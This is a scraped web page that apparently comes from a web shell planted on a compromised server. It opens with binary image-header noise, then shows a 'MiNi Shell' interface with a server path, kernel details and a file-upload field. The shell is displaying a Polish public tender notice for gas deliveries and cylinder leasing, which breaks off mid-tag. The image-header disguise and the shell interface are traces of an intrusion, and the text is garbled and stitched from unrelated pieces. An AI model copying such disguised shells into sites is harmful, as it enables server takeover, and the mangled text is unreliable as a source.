JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221223/0051348501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> SUKCESYWNA DOSTAWA GAZÓW WRAZ Z DZIERŻAWĄ BUTLI </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Instytut Technologii Paliw i Energii</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000025945</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zamkowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zabrze</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-803</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@itpe.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.itpe.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Badania naukowe i prace rozwojowe </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> SUKCESYWNA DOSTAWA GAZÓW WRAZ Z DZIERŻAWĄ BUTLI </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c7afc750-81db-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00513485</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod<br/>adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz w przypadku awarii<br/>miniProtalu poczty elektronicznej.<br/>2. Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: Marta Kucza-Ćwięk, Renata Bonk-Jaska, w godz. 8:00 –<br/>15:00 .<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania<br/>oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>7. Zamawiający udostępnia link do postępowania oraz ID postępowania na stronie BIP Zamawiającego (www bip.itpe.pl). Dane<br/>postępowanie można wyszukać również na Liście wszystkich postępowań<br/>w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>8. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert).<br/>8.1. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami<br/>w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za<br/>pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez<br/>miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>ogłoszenia (BZP lub ID postępowania).<br/>8.2. Zamawiający, w przypadku awarii miniPortalu, może komunikować się z Wykonawcami za pomocą poczty elektronicznej, e-mail<br/>zamowieniapubliczne@itpe.pl<br/>8.3. Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki.<br/>Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.<br/>U. z 2020 poz. 2415)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">32/itpe/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest sukcesywna dostawa gazów wraz z dzierżawą butli szczegółowo opisanych <br/>w specyfikacji asortymentowo-cenowej stanowiącej załącznik nr 3 do SWZ (zwanej dalej „specyfikacją”).<br/>2.	Wykonawca zobowiązany będzie sukcesywnie dostarczać produkty objęte przedmiotem zamówienia, na podstawie zamówień przekazywanych drogą elektroniczną, jednocześnie potwierdzając fakt przyjęcia zamówienia, w tej samej formie.<br/>3.	Gwarantowana ilość produktów, które Zamawiający zakupi w trakcie obowiązywania umowy wykazana jest w Specyfikacji asortymentowo-cenowej stanowiącej załącznik nr 3 do SWZ.<br/>4.	W przypadku zwiększenia zapotrzebowania Zamawiającego na dostawy objęte przedmiotem zamówienia, Zamawiający zastrzega sobie prawo opcji do jednostronnego rozszerzenia przedmiotu zamówienia w zakresie wskazanym w Specyfikacji asortymentowo-cenowej, przy czym realizacja zamówienia nie przekroczy terminu określonego w pkt. 8 SWZ. <br/>5.	Wykonawca zobowiązany będzie do realizacji dostaw objętych prawem opcji na tych samych warunkach co zamówienia gwarantowane. <br/>6.	Przedmiot zamówienia będzie realizowany po cenach określonych w ofercie.<br/>7.	Dostawy gazów w butlach do siedziby Zamawiającego odbywać się będą na koszt i ryzyko Wykonawcy.<br/>8.	Wykonawca zobowiązany będzie każdorazowo do rozładowania butli z gazami w obecności pracownika Zamawiającego.<br/>9.	Butle na gazy muszą być sprawne technicznie, posiadać wszelkie niezbędne, przewidziane przepisami prawa badania, dopuszczające je do użytku. <br/>10.	Wykonawca będzie ponosił pełną odpowiedzialność za posiadanie ważnych badań legalizacyjnych na butle oraz za konserwację dzierżawionych butli. <br/>11.	Butle winny być trwale oznakowane klasą czystości danego gazu. Każda butla winna posiadać tabliczkę, naklejkę itp. z opisanymi parametrami gazu. W przypadku nie spełnienia powyższego wymogu Zamawiający będzie miał prawo nie przyjąć części dostawy. Dzierżawione butle winny być czyste i nie posiadać śladów korozji. <br/>12.	Zamawiający zwróci Wykonawcy przedmiot dzierżawy w stanie nie gorszym od przyjętego, poza normalnym stopniem zużycia wynikającym z jego prawidłowej eksploatacji.<br/>13.	Zamawiający zgłosi Wykonawcy fakt gotowości butli do odbioru na adres e-mailowy wskazany przez niego <br/>w umowie. Wykonawca w terminie do 2 dni roboczych od daty zgłoszenia, na własny koszt dokona odbioru butli, na podstawie dowodu odbioru.<br/>14.	W przypadku, gdy Wykonawca nie odbierze pustych butli w terminie określonym w pkt 4.13 powyżej Zamawiający poniesie koszt ich dzierżawy jedynie do upływu terminu oznaczonego powyżej. <br/>15.	Wykonawca zobowiązany będzie przekazywać Zamawiającemu wszelkie dokumenty wymagane prawem, np. świadectwa jakości i/lub certyfikaty i/lub atesty i/lub dopuszczenia i/lub normy potwierdzające, że dostarczone produkty spełniają wymagania Zamawiającego, do pierwszego zamówienia danego gazu.<br/>16.	Wykonawca będzie odpowiadał za wyrządzoną Zamawiającemu szkodę wynikającą z przekazania przedmiotu zamówienia niezgodnie z postanowieniami niniejszej SWZ albo z naruszeniem staranności lub przestrzegania zasad bezpieczeństwa.<br/>17.	Wykonawca zobowiązany będzie do przeprowadzenia u Zamawiającego inwentaryzacji butli w terminie do 14 dni licząc od daty wygaśnięcia umowy.<br/>18.	Szczegółowe zobowiązania i uprawnienia Wykonawcy i Zamawiającego opisane zostały we wzorze umowy stanowiącym załącznik nr 4 do SWZ.<br/>19.	Zamawiający dopuszcza złożenie oferty równoważnej.<br/>20.	Wykonawca, który oferuje rozwiązania równoważne jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymogi określone przez Zamawiającego. <br/>21.	W przypadku zaoferowania równoważnego przedmiotu zamówienia Wykonawca winien dołączyć do oferty dane umożliwiające jego porównanie z właściwościami (cechami, parametrami opisanymi w specyfikacji asortymentowo-cenowej (zał. nr 3) opisanymi w kol. 2) i 3) produktu wymienionego w specyfikacji (np. specyfikacje techniczne, certyfikaty, świadectwa jakości etc). <br/>22.	W przypadku zastosowania produktu równoważnego Wykonawca powinien:<br/>22.1.	wykazać, że oferowany przez niego produkt spełnia wymagania pozwalające na kontynuację badań naukowych Zamawiającego bez konieczności wykonywania dodatkowych czynności (procedur), <br/>w tym np. kalibracji urządzeń,<br/>22.2.	wykazać, że nie spowoduje zwiększenia kosztów z tytułu konieczności nabycia dodatkowych materiałów zużywalnych,<br/>22.3.	przyjąć na siebie odpowiedzialność za uszkodzenie sprzętu powstałe w wyniku używania zaoferowanego produktu równoważnego, na podstawie opinii wydanej przez autoryzowany serwis producenta sprzętu.<br/>23.	Za równoważny przedmiot zamówienia Zamawiający uzna oferowany przedmiot zamówienia <br/>o właściwościach (cechach, parametrach) spełniających wymagania określone przez Zamawiającego <br/>w specyfikacji. <br/>24.	Przedmiot zamówienia będzie realizowany po cenach określonych w ofercie.<br/>25.	Określenie zamówienia według Wspólnego Słownika Zamówień (CPV): <br/>24110000-8 – gazy przemysłowe, <br/>24100000-5 - gazy.<br/>26.	Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie przez wykonawców, <br/>o których mowa w art. 94 ustawy PZP.<br/>27.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych zadań, zgodnie <br/>z art. 60 i art. 121 ustawy PZP.<br/>28.	Zamawiający nie określa wymagań w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, <br/>o których mowa w art. 95 ustawy PZP.<br/>29.	Zamawiający nie określa wymagań w zakresie zatrudnienia osób, o których mowa w art. 96 ust. 2 pkt. 2 ustawy PZP. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">24110000-8 - Gazy przemysłowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">24100000-5 - Gazy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. W przypadku zwiększenia zapotrzebowania Zamawiającego na dostawy objęte przedmiotem zamówienia, Zamawiający<br/>zastrzega sobie prawo opcji do jednostronnego rozszerzenia przedmiotu zamówienia w zakresie wskazanym w Specyfikacji<br/>asortymentowo-cenowej, przy czym realizacja zamówienia nie przekroczy terminu określonego w pkt. 8 SWZ.<br/>2. Wykonawca zobowiązany będzie do realizacji dostaw objętych prawem opcji na tych samych warunkach co zamówienia<br/>gwarantowane. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4<br/>ustawy PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.zmiany zapisów w umowie z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez<br/>czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu<br/>lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach.<br/>2.zmiany zapisów w umowie z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są<br/>konsekwencją winy którejkolwiek ze Stron.<br/>3.zmiany, w szczególności terminu realizacji zamówienia, gdy zaistnieje inna, niemożliwa do przewidzenia w momencie<br/>podpisywania umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi<br/>odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy.<br/>4.zmiany zapisów w umowie z powodu zmiany lub rezygnacji z udziału Podwykonawcy lub podmiotu trzeciego, (który nie<br/>jest Podwykonawcą). W takim przypadku nowy podmiot powinien wykazywać spełnienie warunku udziału w postępowaniu w<br/>zakresie nie mniejszym niż dotychczasowy (jeżeli dotyczy).<br/>5.zmiany wysokości wynagrodzenia należnego wykonawcy w przypadku zmiany:<br/>a)stawki podatku od towarów i usług oraz podatku akcyzowego. W takim przypadku cena netto pozostaje bez zmian a<br/>należny podatek zostanie doliczony według zasad i stawek obowiązujących w dniu wystawienia przez Wykonawcę faktury<br/>VAT;<br/>b)wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie<br/>ustawy z dnia 10.10.2002 r. o minimalnym wynagrodzeniu za pracę,<br/>c)zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezpieczenia społeczne lub ubezpieczenia zdrowotne,<br/>d)zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia<br/>04.10.2018 r. o pracowniczych planach kapitałowych, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia<br/>przez Wykonawcę.<br/>6.1.Zamawiający przewiduje również możliwość zmiany wysokości wynagrodzenia należnego Wykonawcy, w przypadku<br/>zmiany kosztów związanych z realizacją Umowy. Przez zmianę kosztów rozumie się wzrost kosztów, jak i ich obniżenie,<br/>względem cen jednostkowych wskazanych przez Wykonawcę w Ofercie.<br/>6.2.Wynagrodzenie Wykonawcy może podlegać waloryzacji w oparciu o kwartalny wskaźnik cen towarów i usług<br/>konsumpcyjnych, opublikowany w formie komunikatu przez Prezesa Głównego Urzędu Statystycznego w Dzienniku<br/>Urzędowym RP „Monitor Polski” na stronie internetowej Urzędu.<br/>6.3.Nie wcześniej niż po 6 miesiącach liczonych od dnia zawarcia Umowy, Strony mogą żądać zmiany wynagrodzenia<br/>Wykonawcy. Każda ze Stron Umowy może zwrócić się do drugiej Strony z pisemnym wnioskiem o waloryzację. Możliwe jest<br/>wprowadzenie kolejnych zmian wynagrodzenia z zastrzeżeniem, że będą one wprowadzane nie częściej niż po 6<br/>miesiącach od poprzedniej waloryzacji wynagrodzenia.<br/>6.4.Strony mogą żądać zmiany wynagrodzenia Wykonawcy, jeżeli wskaźnik wzrostu lub obniżenia cen towarów i usług, o<br/>którym mowa w pkt. 6.2. powyżej, z kwartału poprzedzającego wniosek o waloryzację przekroczy 3% wysokości wskaźnika,<br/>o którym mowa w pkt. 6.2. powyżej, z kwartału w którym zawarta została Umowa (pierwsza waloryzacja) a w przypadku<br/>dalszych waloryzacji z kwartału w którym został złożony poprzedni wniosek o waloryzację.<br/>6.5.Waloryzacja wynagrodzenia Wykonawcy będzie następować o różnicę pomiędzy wskaźnikiem, o którym mowa w pkt.<br/>6.2. powyżej z kwartału poprzedzającego wniosek o waloryzację a wskaźnikiem, o którym mowa w pkt. 6.2, z kwartału w<br/>którym zawarta została Umowa (pierwsza waloryzacja) a w przypadku dalszych waloryzacji z kwartału w którym został<br/>złożony poprzedni wniosek o waloryzację minus 3%.<br/>6.6.W wyniku dokonania wszystkich waloryzacji, wynagrodzenie może ulec zwiększeniu lub zmniejszeniu maksymalnie o<br/>5% łącznej wysokości wynagrodzenia brutto, o którym mowa w § 5 wzoru Umowy.<br/>6.7.Powyższa zmiana wymaga aneksu do Umowy w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla Wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 